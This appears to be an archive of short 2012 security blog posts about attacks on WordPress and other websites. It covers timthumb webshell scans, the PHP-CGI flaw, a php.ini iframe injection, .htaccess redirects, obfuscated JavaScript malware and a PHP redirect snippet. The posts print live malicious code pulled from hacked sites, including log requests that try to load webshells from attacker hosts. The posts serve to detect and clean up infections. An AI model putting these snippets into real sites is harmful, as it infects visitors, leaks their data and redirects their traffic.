List of Domains Hosting Webshells for Timthumb Attacks

We have been tracking TimThumb related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for those type of attacks and a botnet with more than 1,000 IP addresses scanning sites that might be vulnerable to it.

If you like to look at your logs, that’s how it would look like:

216.227.214.242 – – [31/May/2012:03:55:35 +0000] “GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1″ 404 9347 “-” “”

or

112.78.3.167 – – [31/May/2012:03:45:50 +0000] “GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1″ 404 305 “-” “”

Basically searching for hundreds of themes per site that could have the old timthumb.php enabled and attempting to insert the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php on it.

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb .

PHP-CGI Vulnerability Exploited in the Wild

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we noticed that the attack starts in two ways, either by checking if the server is vulnerable using the ?-s option (which shows the source of the page):

Read More

WordPress Third Party Vulnerability – Deans FCKEditor with PWWANGS Code for WordPress(version 1.0.0)

You have heard me write in the past about understanding the true Vulnerability within WordPress. In that post I talk to the benefits of the platform and how those same benefits are also its weakness. This post is an example that brings that point home, specifically about staying diligent with your plugins.

It was recently released that a plugin for WordPress, Deans FCKEditor with PWWANGS Code Plugin for WordPress, was known to contain a very serious vulnerability that gives hackers full control to modify, upload and execute files within your WordPress install (source PacketStorm). This vulnerability is actually not new and was found for version 1.0.0. That’s not the point though, what is, is that this version is in fact vulnerable.
Read More

Malware Being Called From Your php.ini File

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:


Read More

Joomla 1.5.25/1.7.3 Released (Security Update)

If you are using Joomla, now is the time to update it. A new version was just released for the 1.5.x and 1.7.x branches fixing a high priority security issue that will allow remote users to change other users passwords (even on admin account).

More details on the Joomla website and here.

Description:
Weak random number generation during password reset leads to possibility of changing a user’s password.

Read More

Htaccess Redirection to Sweepstakesandcontestsinfo dot com

Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.

* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>


Read More

Timthumb.php Mass Infection – Aftermath – Part I

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to gain metrics based on the amount of sites that were truly affected, the problem is that it’s very hard to estimate how many sites were in fact compromised. 1 thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months most of the sites compromised had their wp-settings.php modified with a function to contact the URL http://91.196.216.30/bt.php for more information on what to do with the site (display malware, spam, etc). Yes, kinda like a command and control site.

Read More

MyBB web site and downloads compromised

It’s not good when your site gets infected with malware, specially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site hacked and the software download packages compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommend these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Malware Infections from rebotstat dot com

We are starting to share some of our research and view of web-based malware online: http://sucuri.net/global. The #1 infection we are seeing in the last few days is caused by a heavily encoded piece of javascript malware:

<!– o –><script>b=new function()
{return 2;};if(!+b)String&#46prototype&#46vqwfbeweb=’h’+’arC';for(i 
in $=’b4h3tbn’)
if(i==’vqwfbeweb’)m=$[i];try{new Object()&#46wehweh();}catch(q)
{ss="";}try{window[‘e’+’v’+’al’](‘asdas’)}catch(q)
{s=String["fr"+"omC"+m+"od"+’e’];}d=new Date();d2=new Date(d&#46valueOf()-2);Object&#46prototype&#46asd=’e';if({}&#46asd===’e’)a=document["c"+"r"+"e"+"a"+"
t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"](‘321′);if(a&#46data==321)x=-1*(d-
d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,
-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,
-x+107,-x+99,..
for(i=0;i<n&#46length;i++)ss +=s(e val("n"+"[i"+"]"));
if(!+b) e val(ss);</script><!– c –>


Read More

Website Getting Redirected? It Might Have Something To Do With Moneygram-tracking Dot Com

Have you ever tried to visit your site and you got redirected to a different site? Maybe some external news page that had nothing to do with your site? Then have you tried to visit it again to test and it worked properly?

Over the last few days we’ve been getting this question often and it means that your site has been hacked and compromised. Basically the attackers added a code similar to this to your site:

$url = “http://moneygram-tracking.com/cabl/ws/12/request.php?ip=”.$_SERVER[‘REMOTE_ADDR’].”&useragent=”.urlencode($_SERVER[‘HTTP_USER_AGENT’]).”&referer=”.urlencode($_SERVER[“HTTP_REFERER”]);
$answer = file_get_contents($url);
if (strpos($answer,”noredirect”) === false) {
echo $answer;
}


Read More